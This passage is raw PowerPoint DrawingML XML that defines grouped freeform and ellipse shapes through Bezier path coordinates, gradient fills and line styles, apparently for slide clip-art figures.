                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{954945A6-77ED-412A-A217-62595A531E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220" y="2422"/>
                  <a:ext cx="131" cy="315"/>
                  <a:chOff x="3736" y="1032"/>
                  <a:chExt cx="266" cy="635"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2105" name="Freeform 1147">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F98F184-AD78-4D57-85F5-3089C23600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3803" y="1338"/>
                    <a:ext cx="121" cy="329"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 90 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 3 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 44 w 90"/>
                      <a:gd name="T17" fmla="*/ 204 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 39 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 44 w 90"/>
                      <a:gd name="T25" fmla="*/ 204 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="140"/>
                          <a:pt x="90" y="47"/>
                          <a:pt x="90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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="19"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="9"/>
                          <a:pt x="4" y="4"/>
                          <a:pt x="3" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="224"/>
                          <a:pt x="44" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="170"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="46"/>
                          <a:pt x="36" y="39"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="46"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="170"/>
                          <a:pt x="44" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="206"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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74118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06" name="Freeform 1148">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26B900C-EB40-4739-8987-64853A2857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3736" y="1118"/>
                    <a:ext cx="266" cy="310"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 192 w 198"/>
                      <a:gd name="T1" fmla="*/ 194 h 231"/>
                      <a:gd name="T2" fmla="*/ 169 w 198"/>
                      <a:gd name="T3" fmla="*/ 49 h 231"/>
                      <a:gd name="T4" fmla="*/ 143 w 198"/>
                      <a:gd name="T5" fmla="*/ 24 h 231"/>
                      <a:gd name="T6" fmla="*/ 100 w 198"/>
                      <a:gd name="T7" fmla="*/ 12 h 231"/>
                      <a:gd name="T8" fmla="*/ 60 w 198"/>
                      <a:gd name="T9" fmla="*/ 2 h 231"/>
                      <a:gd name="T10" fmla="*/ 30 w 198"/>
                      <a:gd name="T11" fmla="*/ 11 h 231"/>
                      <a:gd name="T12" fmla="*/ 4 w 198"/>
                      <a:gd name="T13" fmla="*/ 159 h 231"/>
                      <a:gd name="T14" fmla="*/ 36 w 198"/>
                      <a:gd name="T15" fmla="*/ 168 h 231"/>
                      <a:gd name="T16" fmla="*/ 54 w 198"/>
                      <a:gd name="T17" fmla="*/ 47 h 231"/>
                      <a:gd name="T18" fmla="*/ 53 w 198"/>
                      <a:gd name="T19" fmla="*/ 164 h 231"/>
                      <a:gd name="T20" fmla="*/ 62 w 198"/>
                      <a:gd name="T21" fmla="*/ 174 h 231"/>
                      <a:gd name="T22" fmla="*/ 113 w 198"/>
                      <a:gd name="T23" fmla="*/ 188 h 231"/>
                      <a:gd name="T24" fmla="*/ 140 w 198"/>
                      <a:gd name="T25" fmla="*/ 169 h 231"/>
                      <a:gd name="T26" fmla="*/ 140 w 198"/>
                      <a:gd name="T27" fmla="*/ 169 h 231"/>
                      <a:gd name="T28" fmla="*/ 138 w 198"/>
                      <a:gd name="T29" fmla="*/ 87 h 231"/>
                      <a:gd name="T30" fmla="*/ 136 w 198"/>
                      <a:gd name="T31" fmla="*/ 70 h 231"/>
                      <a:gd name="T32" fmla="*/ 136 w 198"/>
                      <a:gd name="T33" fmla="*/ 69 h 231"/>
                      <a:gd name="T34" fmla="*/ 136 w 198"/>
                      <a:gd name="T35" fmla="*/ 70 h 231"/>
                      <a:gd name="T36" fmla="*/ 138 w 198"/>
                      <a:gd name="T37" fmla="*/ 87 h 231"/>
                      <a:gd name="T38" fmla="*/ 159 w 198"/>
                      <a:gd name="T39" fmla="*/ 203 h 231"/>
                      <a:gd name="T40" fmla="*/ 192 w 198"/>
                      <a:gd name="T41" fmla="*/ 194 h 2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98" h="231">
                        <a:moveTo>
                          <a:pt x="192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6"/>
                          <a:pt x="143" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="135" y="21"/>
                          <a:pt x="113" y="16"/>
                          <a:pt x="100" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="88" y="9"/>
                          <a:pt x="69" y="3"/>
                          <a:pt x="60" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="51" y="0"/>
                          <a:pt x="33" y="3"/>
                          <a:pt x="30" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="28" y="17"/>
                          <a:pt x="8" y="139"/>
                          <a:pt x="4" y="159"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="180"/>
                          <a:pt x="31" y="184"/>
                          <a:pt x="36" y="168"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="157"/>
                          <a:pt x="55" y="38"/>
                          <a:pt x="54" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="53"/>
                          <a:pt x="53" y="121"/>
                          <a:pt x="53" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="169"/>
                          <a:pt x="56" y="173"/>
                          <a:pt x="62" y="174"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="74" y="177"/>
                          <a:pt x="106" y="187"/>
                          <a:pt x="113" y="188"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="190"/>
                          <a:pt x="137" y="180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0"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="78"/>
                          <a:pt x="137" y="73"/>
                          <a:pt x="136" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="75"/>
                          <a:pt x="138" y="81"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="109"/>
                          <a:pt x="148" y="149"/>
                          <a:pt x="159" y="203"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="165" y="231"/>
                          <a:pt x="198" y="218"/>
                          <a:pt x="192" y="194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74118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07" name="Freeform 1149">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC13342-D34E-4918-BC13-06ABA15A69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3822" y="1101"/>
                    <a:ext cx="88" cy="55"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 29 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 9 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 15 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 53 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 30 h 41"/>
                      <a:gd name="T10" fmla="*/ 29 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="29" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="9" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="15" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="53" y="0"/>
                          <a:pt x="53" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="53" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="29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08" name="Oval 1150">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A8F93A-BE6B-4A99-BA0F-5B2D5D49A1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gray">
                  <a:xfrm flipH="1">
                    <a:off x="3810" y="1032"/>
                    <a:ext cx="106" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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1713" name="Freeform 1310">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BBBF0E-525A-4AF7-8AB2-91E834A0F417}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6191109" y="2990422"/>
              <a:ext cx="1340775" cy="361279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noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF66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ACAC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25400" dir="54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714" name="Group 1713">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AEEC23-8B06-4AB8-81B5-B2A9B7331C89}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6138876" y="2845574"/>
              <a:ext cx="1407293" cy="392582"/>
              <a:chOff x="5327650" y="2433638"/>
              <a:chExt cx="1712913" cy="477838"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2041" name="Line 1739">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9B94A4F-AFFE-487B-9608-A6D7C53054F7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>
                <a:off x="6948488" y="2744788"/>
                <a:ext cx="0" cy="142875"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="FF66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042" name="Group 1726">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E3F982E-B425-43A3-A480-55ED28F30D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83363" y="2528888"/>
                <a:ext cx="457200" cy="268288"/>
                <a:chOff x="-1948" y="-2460"/>
                <a:chExt cx="1368" cy="801"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2086" name="Freeform 1727">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{153076B1-6BB5-434F-A2BC-880868FADCF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1662" y="-2460"/>
                  <a:ext cx="498" cy="622"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 211"/>
                    <a:gd name="T1" fmla="*/ 8 h 263"/>
                    <a:gd name="T2" fmla="*/ 14 w 211"/>
                    <a:gd name="T3" fmla="*/ 207 h 263"/>
                    <a:gd name="T4" fmla="*/ 192 w 211"/>
                    <a:gd name="T5" fmla="*/ 254 h 263"/>
                    <a:gd name="T6" fmla="*/ 192 w 211"/>
                    <a:gd name="T7" fmla="*/ 56 h 263"/>
                    <a:gd name="T8" fmla="*/ 14 w 211"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="226"/>
                        <a:pt x="179" y="263"/>
                        <a:pt x="192" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="246"/>
                        <a:pt x="211" y="94"/>
                        <a:pt x="192" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="42"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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87" name="Freeform 1728">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54BF45DA-4D5F-4052-AC0E-DCFCDE96591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1599" y="-2398"/>
                  <a:ext cx="359" cy="493"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 359"/>
                    <a:gd name="T1" fmla="*/ 0 h 493"/>
                    <a:gd name="T2" fmla="*/ 0 w 359"/>
                    <a:gd name="T3" fmla="*/ 397 h 493"/>
                    <a:gd name="T4" fmla="*/ 359 w 359"/>
                    <a:gd name="T5" fmla="*/ 493 h 493"/>
                    <a:gd name="T6" fmla="*/ 359 w 359"/>
                    <a:gd name="T7" fmla="*/ 97 h 493"/>
                    <a:gd name="T8" fmla="*/ 0 w 359"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="493">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="493"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="9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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="70588"/>
                        <a:invGamma/>
                      </a:srgbClr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88" name="Freeform 1729">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC04372-C8A9-4C8A-BBFE-AACEB3331B4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1629" y="-2457"/>
                  <a:ext cx="479" cy="153"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 99 w 203"/>
                    <a:gd name="T1" fmla="*/ 15 h 65"/>
                    <a:gd name="T2" fmla="*/ 27 w 203"/>
                    <a:gd name="T3" fmla="*/ 0 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 7 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 7 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 203"/>
                    <a:gd name="T9" fmla="*/ 7 h 65"/>
                    <a:gd name="T10" fmla="*/ 178 w 203"/>
                    <a:gd name="T11" fmla="*/ 55 h 65"/>
                    <a:gd name="T12" fmla="*/ 203 w 203"/>
                    <a:gd name="T13" fmla="*/ 48 h 65"/>
                    <a:gd name="T14" fmla="*/ 99 w 203"/>
                    <a:gd name="T15" fmla="*/ 15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03" h="65">
                      <a:moveTo>
                        <a:pt x="99" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="27" y="0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2" y="0"/>
                        <a:pt x="168" y="44"/>
                        <a:pt x="178" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="65"/>
                        <a:pt x="203" y="48"/>
                        <a:pt x="203" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="48"/>
                        <a:pt x="163" y="29"/>
                        <a:pt x="99" y="1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89" name="Freeform 1730">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCC9731-F47B-444B-A1F4-C27234F6900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1209" y="-2344"/>
                  <a:ext cx="352" cy="484"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 205 h 205"/>
                    <a:gd name="T2" fmla="*/ 15 w 149"/>
                    <a:gd name="T3" fmla="*/ 201 h 205"/>
                    <a:gd name="T4" fmla="*/ 129 w 149"/>
                    <a:gd name="T5" fmla="*/ 150 h 205"/>
                    <a:gd name="T6" fmla="*/ 149 w 149"/>
                    <a:gd name="T7" fmla="*/ 112 h 205"/>
                    <a:gd name="T8" fmla="*/ 149 w 149"/>
                    <a:gd name="T9" fmla="*/ 60 h 205"/>
                    <a:gd name="T10" fmla="*/ 25 w 149"/>
                    <a:gd name="T11" fmla="*/ 0 h 205"/>
                    <a:gd name="T12" fmla="*/ 0 w 149"/>
                    <a:gd name="T13" fmla="*/ 7 h 205"/>
                    <a:gd name="T14" fmla="*/ 0 w 149"/>
                    <a:gd name="T15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49" h="205">
                      <a:moveTo>
                        <a:pt x="0" y="205"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="6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3" y="35"/>
                        <a:pt x="20" y="189"/>
                        <a:pt x="0" y="20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90" name="Freeform 1731">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4963954-AC20-4CE2-BC33-A71B4E4EA23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1948" y="-1964"/>
                  <a:ext cx="661" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 661"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 661"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 661 w 661"/>
                    <a:gd name="T5" fmla="*/ 121 h 175"/>
                    <a:gd name="T6" fmla="*/ 453 w 661"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 661"/>
                    <a:gd name="T9" fmla="*/ 52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1" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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91" name="Freeform 1732">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF65C573-C503-4AB1-B8FF-6A1698C74A7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1495" y="-1843"/>
                  <a:ext cx="199" cy="87"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 199"/>
                    <a:gd name="T1" fmla="*/ 54 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 199"/>
                    <a:gd name="T3" fmla="*/ 87 h 87"/>
                    <a:gd name="T4" fmla="*/ 199 w 199"/>
                    <a:gd name="T5" fmla="*/ 35 h 87"/>
                    <a:gd name="T6" fmla="*/ 199 w 199"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 199"/>
                    <a:gd name="T9" fmla="*/ 54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9" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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92" name="Freeform 1733">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72CC84D5-7F30-49B1-BEE4-FFE7AA075C0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1948" y="-1912"/>
                  <a:ext cx="453" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 36 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 156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3" h="156">
                      <a:moveTo>
                        <a:pt x="453" y="156"/>
                      </a:move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453" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="15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93" name="Freeform 1734">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{094D204C-443F-4748-AF23-448535686CF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1884" y="-1949"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 37 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 37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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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94" name="Freeform 1735">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B75F0E5-CAC7-4C3C-BE17-85FCEF18239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1034" y="-2247"/>
                  <a:ext cx="454" cy="588"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 454"/>
                    <a:gd name="T1" fmla="*/ 120 h 588"/>
                    <a:gd name="T2" fmla="*/ 0 w 454"/>
                    <a:gd name="T3" fmla="*/ 588 h 588"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 468 h 588"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 0 h 588"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 120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588">
                      <a:moveTo>
                        <a:pt x="0" y="120"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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95" name="Freeform 1736">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAF91A5-EE58-4EE7-8A84-6814A3601EB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1258" y="-2188"/>
                  <a:ext cx="224" cy="529"/>
                </a:xfrm>
